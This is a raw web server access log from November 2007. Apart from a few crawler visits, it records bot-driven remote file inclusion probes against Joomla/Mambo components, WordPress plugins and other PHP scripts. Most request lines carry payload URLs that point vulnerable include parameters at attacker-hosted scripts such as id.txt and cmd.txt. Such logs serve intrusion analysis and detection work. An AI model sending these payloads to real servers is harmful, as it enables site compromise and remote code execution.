200.137.130.13 - - [11/Nov/2007:16:00:02 -0800] "GET /logs/?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 5228 "-" "libwww-perl/5.805"
198.77.208.8 - - [11/Nov/2007:16:00:02 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
198.77.208.8 - - [11/Nov/2007:16:00:03 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.137.130.13 - - [11/Nov/2007:16:00:05 -0800] "GET /logs/access_070730.log/?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:16:00:06 -0800] "GET /logs/access_070806.log/index.php?x=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.6.23.81 - - [11/Nov/2007:16:02:33 -0800] "GET /cendoc.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.10.142.26 - - [11/Nov/2007:16:03:39 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.142.26 - - [11/Nov/2007:16:03:39 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.10.142.26 - - [11/Nov/2007:16:03:39 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.213.88.13 - - [11/Nov/2007:16:03:44 -0800] "GET /logs/template.php?pagina=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:16:03:45 -0800] "GET /template.php?pagina=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.10.142.26 - - [11/Nov/2007:16:04:00 -0800] "GET /logs/access_071001.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.49.155.233 - - [11/Nov/2007:16:04:21 -0800] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.inteligentesite.com.br/arquivos/marajoara/teste.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.49.155.233 - - [11/Nov/2007:16:04:22 -0800] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.inteligentesite.com.br/arquivos/marajoara/teste.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.34.224.165 - - [11/Nov/2007:16:04:24 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.34.224.165 - - [11/Nov/2007:16:04:25 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.83 - - [11/Nov/2007:16:05:01 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.83 - - [11/Nov/2007:16:05:01 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.83 - - [11/Nov/2007:16:05:19 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
192.154.64.20 - - [11/Nov/2007:16:05:19 -0800] "GET /logs/index.php?file=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.74.83 - - [11/Nov/2007:16:05:19 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
192.154.64.20 - - [11/Nov/2007:16:05:19 -0800] "GET /index.php?file=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:05:38 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [11/Nov/2007:16:05:38 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:05:38 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.34.224.165 - - [11/Nov/2007:16:05:41 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.34.224.165 - - [11/Nov/2007:16:05:41 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [11/Nov/2007:16:05:41 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [11/Nov/2007:16:05:41 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:05:57 -0800] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.34.224.165 - - [11/Nov/2007:16:06:01 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.34.224.165 - - [11/Nov/2007:16:06:02 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.93.203.42 - - [11/Nov/2007:16:06:02 -0800] "GET /logs/access_071014.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:06:02 -0800] "GET /logs/access_070716.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.66.107 - - [11/Nov/2007:16:06:11 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [11/Nov/2007:16:06:11 -0800] "GET /logs/template.php?pagina=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [11/Nov/2007:16:06:11 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [11/Nov/2007:16:06:12 -0800] "GET /template.php?pagina=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:06:12 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [11/Nov/2007:16:06:15 -0800] "GET /logs/access_070730.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:06:15 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:06:15 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:06:31 -0800] "GET /logs/access_071022.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:06:38 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:06:38 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:17 -0800] "GET /logs/access_070806.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:17 -0800] "GET /logs/access_070709.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:17 -0800] "GET /logs/access_070826.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:32 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:33 -0800] "GET /logs/access_071001.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:37 -0800] "GET /logs/access_070625.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.15.54.5 - - [11/Nov/2007:16:08:37 -0800] "GET /logs/template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:16:08:37 -0800] "GET /template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:16:08:43 -0800] "GET /logs/template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:16:08:43 -0800] "GET /template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:16:08:47 -0800] "GET /logs/access_070910.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:16:09:00 -0800] "GET /logs/template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.94.118 - - [11/Nov/2007:16:09:00 -0800] "GET /template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
198.77.208.8 - - [11/Nov/2007:16:09:02 -0800] "GET /logs/access_070820.log//akocomments.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
69.93.203.42 - - [11/Nov/2007:16:09:03 -0800] "GET /logs/access_071029.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.54.5 - - [11/Nov/2007:16:09:15 -0800] "GET /logs/template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.15.54.5 - - [11/Nov/2007:16:09:15 -0800] "GET /template.php?pagina=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
204.209.9.68 - - [11/Nov/2007:16:09:36 -0800] "GET /logs/template.php?pagina=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:16:09:36 -0800] "GET /template.php?pagina=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:16:09:50 -0800] "GET /logs/template.php?pagina=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
204.209.9.68 - - [11/Nov/2007:16:09:50 -0800] "GET /template.php?pagina=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
198.77.208.8 - - [11/Nov/2007:16:10:01 -0800] "GET /logs/access_071008.log//akocomments.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.34.224.165 - - [11/Nov/2007:16:10:26 -0800] "GET /logs/access_070723.log/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.137.130.13 - - [11/Nov/2007:16:10:33 -0800] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805"
209.34.224.165 - - [11/Nov/2007:16:10:38 -0800] "GET /logs/access_070730.log/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.137.130.13 - - [11/Nov/2007:16:11:09 -0800] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
81.231.74.206 - - [11/Nov/2007:16:11:51 -0800] "GET /logs/template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.231.74.206 - - [11/Nov/2007:16:11:52 -0800] "GET /template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.231.74.206 - - [11/Nov/2007:16:12:52 -0800] "GET /logs/template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
81.231.74.206 - - [11/Nov/2007:16:12:52 -0800] "GET /template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
69.93.189.130 - - [11/Nov/2007:16:13:28 -0800] "GET /logs/template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.189.130 - - [11/Nov/2007:16:13:28 -0800] "GET /template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.29.66.107 - - [11/Nov/2007:16:13:39 -0800] "GET /logs/access_070723.log/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.66.107 - - [11/Nov/2007:16:13:40 -0800] "GET /logs/access_070723.log/template.php?pagina=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:14:00 -0800] "GET /logs/template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
69.93.189.130 - - [11/Nov/2007:16:14:00 -0800] "GET /template.php?pagina=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
65.55.208.233 - - [11/Nov/2007:16:14:17 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.233 - - [11/Nov/2007:16:14:17 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
72.29.66.107 - - [11/Nov/2007:16:14:18 -0800] "GET /logs/access_070730.log/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [11/Nov/2007:16:14:18 -0800] "GET /logs/access_070730.log/template.php?pagina=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:14:23 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.21.152.2 - - [11/Nov/2007:16:14:41 -0800] "GET /logs/access_070820.log//akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.6.19.148 - - [11/Nov/2007:16:14:45 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.10.142.26 - - [11/Nov/2007:16:15:22 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.10.142.26 - - [11/Nov/2007:16:15:23 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.137.130.13 - - [11/Nov/2007:16:15:50 -0800] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:15:53 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
80.201.245.187 - - [11/Nov/2007:16:16:09 -0800] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
80.201.245.187 - - [11/Nov/2007:16:16:09 -0800] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.21.152.2 - - [11/Nov/2007:16:16:10 -0800] "GET /logs/access_071008.log//akocomments.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.137.130.13 - - [11/Nov/2007:16:16:35 -0800] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
72.30.216.8 - - [11/Nov/2007:16:17:52 -0800] "GET /logs/access.log HTTP/1.0" 200 18729 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:18:24 -0800] "GET /logs/template.php?pagina=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
160.75.69.1 - - [11/Nov/2007:16:18:25 -0800] "GET /template.php?pagina=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:18:45 -0800] "GET /logs/template.php?pagina=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
160.75.69.1 - - [11/Nov/2007:16:18:46 -0800] "GET /template.php?pagina=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
80.201.245.187 - - [11/Nov/2007:16:19:28 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:19:29 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:19:29 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
80.201.245.187 - - [11/Nov/2007:16:19:30 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
69.93.189.130 - - [11/Nov/2007:16:19:35 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:19:35 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:16:19:52 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:19:56 -0800] "GET /logs/template.php?pagina=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:19:57 -0800] "GET /template.php?pagina=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:20:16 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:16:20:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.201.245.187 - - [11/Nov/2007:16:20:31 -0800] "GET /logs/template.php?pagina=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
80.201.245.187 - - [11/Nov/2007:16:20:35 -0800] "GET /template.php?pagina=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
160.75.69.1 - - [11/Nov/2007:16:20:50 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:16:21:05 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.240.236.3 - - [11/Nov/2007:16:21:05 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.10.142.26 - - [11/Nov/2007:16:23:13 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.142.26 - - [11/Nov/2007:16:23:18 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://impero88.altervista.org/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:11 -0800] "GET /logs/template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.74.15 - - [11/Nov/2007:16:24:12 -0800] "GET /logs/template.php?pagina=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:12 -0800] "GET /template.php?pagina=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.74.15 - - [11/Nov/2007:16:24:12 -0800] "GET /template.php?pagina=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:18 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:18 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:19 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:19 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:19 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.101.4.42 - - [11/Nov/2007:16:24:19 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
